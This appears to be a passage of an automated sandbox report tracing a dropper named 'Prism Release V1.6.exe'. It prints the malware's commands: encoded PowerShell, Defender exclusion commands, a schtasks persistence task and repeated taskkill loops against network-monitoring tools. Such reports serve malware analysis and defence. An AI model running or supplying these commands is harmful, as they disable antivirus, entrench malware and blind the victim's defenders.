PID 4968 wrote to memory of 4212	4968	chrome.exe	chrome.exe
PID 4968 wrote to memory of 4212	4968	chrome.exe	chrome.exe
PID 4968 wrote to memory of 4212	4968	chrome.exe	chrome.exe
PID 4968 wrote to memory of 4212	4968	chrome.exe	chrome.exe
PID 4968 wrote to memory of 4212	4968	chrome.exe	chrome.exe
PID 4968 wrote to memory of 4212	4968	chrome.exe	chrome.exe
PID 4968 wrote to memory of 4608	4968	chrome.exe	chrome.exe
PID 4968 wrote to memory of 4608	4968	chrome.exe	chrome.exe
PID 4968 wrote to memory of 1688	4968	chrome.exe	chrome.exe
PID 4968 wrote to memory of 1688	4968	chrome.exe	chrome.exe
PID 4968 wrote to memory of 1688	4968	chrome.exe	chrome.exe
PID 4968 wrote to memory of 1688	4968	chrome.exe	chrome.exe
PID 4968 wrote to memory of 1688	4968	chrome.exe	chrome.exe
PID 4968 wrote to memory of 1688	4968	chrome.exe	chrome.exe
PID 4968 wrote to memory of 1688	4968	chrome.exe	chrome.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\Prism Release V1.6.exe
"C:\Users\Admin\AppData\Local\Temp\Prism Release V1.6.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:400

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAcwBhACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG0AeQBsACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcALgBnAGcALwBnAGUAdABwAHIAaQBzAG0AIABSAFUATgAgAEEAUwAgAEEARABNAEkATgAgAEkARgAgAEkATgBKAEUAQwBUAEkATwBOACAARgBBAEkATABTACcALAAnACcALAAnAE8ASwAnACwAJwBJAG4AZgBvAHIAbQBhAHQAaQBvAG4AJwApADwAIwBoAHAAeQAjAD4A"
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4216

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAYQB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAZABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAdABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAdgBrACMAPgA="
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1876

C:\Users\Admin\AppData\Roaming\Prism.exe
"C:\Users\Admin\AppData\Roaming\Prism.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5052

C:\Users\Admin\AppData\Local\Temp\onefile_5052_133629162676596204\nexusloader.exe
"C:\Users\Admin\AppData\Roaming\Prism.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2152

C:\Users\Admin\AppData\Local\dllhost.exe
"C:\Users\Admin\AppData\Local\dllhost.exe"
2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2860

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\dllhost.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2448

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'dllhost.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2920

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Windows Runtime.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4312

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Runtime.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3628

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Runtime" /tr "C:\ProgramData\Windows Runtime.exe"
3⤵
- Creates scheduled task(s)
PID:2240

C:\Users\Admin\AppData\Local\Temp\jdmlfb.exe
"C:\Users\Admin\AppData\Local\Temp\jdmlfb.exe"
3⤵
- Executes dropped EXE
PID:4752

C:\Users\Admin\AppData\Local\Temp\onefile_4752_133629163400391547\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\jdmlfb.exe"
4⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:4008

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
5⤵
PID:2212

C:\Users\Admin\AppData\Local\Temp\onefile_4752_133629163400391547\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\onefile_4752_133629163400391547\svchost.exe" "--multiprocessing-fork" "parent_pid=4008" "pipe_handle=468"
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
6⤵
PID:232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:2832

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:2448

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:1176

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
- Kills process with taskkill
PID:5024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:3028

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:3316

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:3048

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:5076

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:232

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:3888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:216

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:3836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:4384

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:3300

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:3800

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:2988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:4560

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:2448

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:3316

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
- Kills process with taskkill
PID:3044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:4100

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:4316

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:3364

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:5112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:2564

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:3056

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:5068

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:2976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:4324

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:864

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:1020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:3316

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:1068

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:3600

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:548

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:2460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:4972

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:744

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:4636

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:4040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:1332

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:4852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:5020

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:2684

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:3916

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:1176

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:2448

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:4988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:3812

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:1284

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:4920

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:3060

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
- Kills process with taskkill
PID:2832

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:1356

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:1496

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:2688

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:4500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:3016

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:2316

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:2988

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:1652

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:3112

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:1680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:5008

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:1836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:4648

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:1572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:2976

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:2472

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:3016

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:1176

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:1068

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:2136

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:1972

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:4976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:4488

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:3296

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:2844

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:3044

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:4184

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:3960

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:2988

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:3112

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:4744

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:4932

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:832

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:4564

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:2312

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:4048

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:3168

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:4736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:1652

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:4084

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:4924

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:5116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:4332

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:4316

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:2160

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:4976

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:1512

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:2244

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:3468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:4948

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:3852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:4424

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:3980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:3800

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:4024

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:5076

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:4644

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:3404

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:3316

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:3068

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:2460

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:3040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:4948

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:4956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:2948

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:2568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:3960

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:3692

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:2072

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
- Kills process with taskkill
PID:2552

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:5112

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:3028

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:1656

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:4012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:1568

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:2224

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:4280

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
- Kills process with taskkill
PID:2972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:1176

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:2936

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:1748

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:4300

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:2440

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:3600

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:2448

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:2988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:2056

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:2232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:4252

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:3852

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:3484

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:3580

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:3096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:2968

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:2976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:1304

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:3568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:1808

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:1984

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:2072

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:3612

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:2112

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:3836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:4380

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:1972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:4972

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:2244

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:556

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:4888

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:3980

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:2476

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:2304

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:3764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:2936

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:2636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:3692

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:2992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:2116

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:2440

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:2212

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:3836

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:2020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:4732

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:1972

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
PID:2160

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:2700

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
PID:4308

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:4836

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:2388

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:3668

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
7⤵
PID:5116

C:\Windows\system32\taskkill.exe
taskkill /F /IM tcpdump.exe
7⤵
PID:4220

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM ettercap.exe"
6⤵
PID:3688

C:\Windows\system32\taskkill.exe
taskkill /F /IM ettercap.exe
7⤵
PID:4580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM dumpcap.exe"
6⤵
PID:4300

C:\Windows\system32\taskkill.exe
taskkill /F /IM dumpcap.exe
7⤵
PID:1360

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM windump.exe"
6⤵
PID:3404

C:\Windows\system32\taskkill.exe
taskkill /F /IM windump.exe
7⤵
PID:3600

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM fiddler.exe"
6⤵
PID:4156

C:\Windows\system32\taskkill.exe
taskkill /F /IM fiddler.exe
7⤵
PID:3616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM httpdebuggerui.exe"
6⤵
PID:4288

C:\Windows\system32\taskkill.exe
taskkill /F /IM httpdebuggerui.exe
7⤵
- Kills process with taskkill
PID:2688

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM wireshark.exe"
6⤵
PID:1704

C:\Windows\system32\taskkill.exe
taskkill /F /IM wireshark.exe
7⤵
- Kills process with taskkill
PID:3096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tshark.exe"
6⤵
PID:4448

C:\Windows\system32\taskkill.exe
taskkill /F /IM tshark.exe
7⤵
PID:1176

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM tcpdump.exe"
6⤵
PID:2036

